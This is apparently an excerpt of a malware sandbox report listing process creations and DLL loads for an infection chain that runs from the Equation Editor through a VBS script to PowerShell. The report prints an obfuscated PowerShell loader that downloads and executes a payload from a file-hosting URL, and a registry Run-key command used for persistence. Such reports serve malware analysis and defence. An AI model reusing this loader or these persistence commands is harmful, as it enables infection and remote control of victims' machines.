Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\dialogistic.Hed && echo $"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe "C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe"
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w 1 $Hypokonderens=(Get-ItemProperty -Path 'HKCU:\Oversigtslisterne\').Incharity;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Hypokonderens)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\dialogistic.Hed && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe "C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magicremoihohj75.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\dialogistic.Hed && echo $"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\dialogistic.Hed && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Chansonens% -w 1 $Hypokonderens=(Get-ItemProperty -Path 'HKCU:\Oversigtslisterne\').Incharity;%Chansonens% ($Hypokonderens)"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Chansonens% -w 1 $Hypokonderens=(Get-ItemProperty -Path 'HKCU:\Oversigtslisterne\').Incharity;%Chansonens% ($Hypokonderens)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\dialogistic.Hed && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\dialogistic.Hed && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
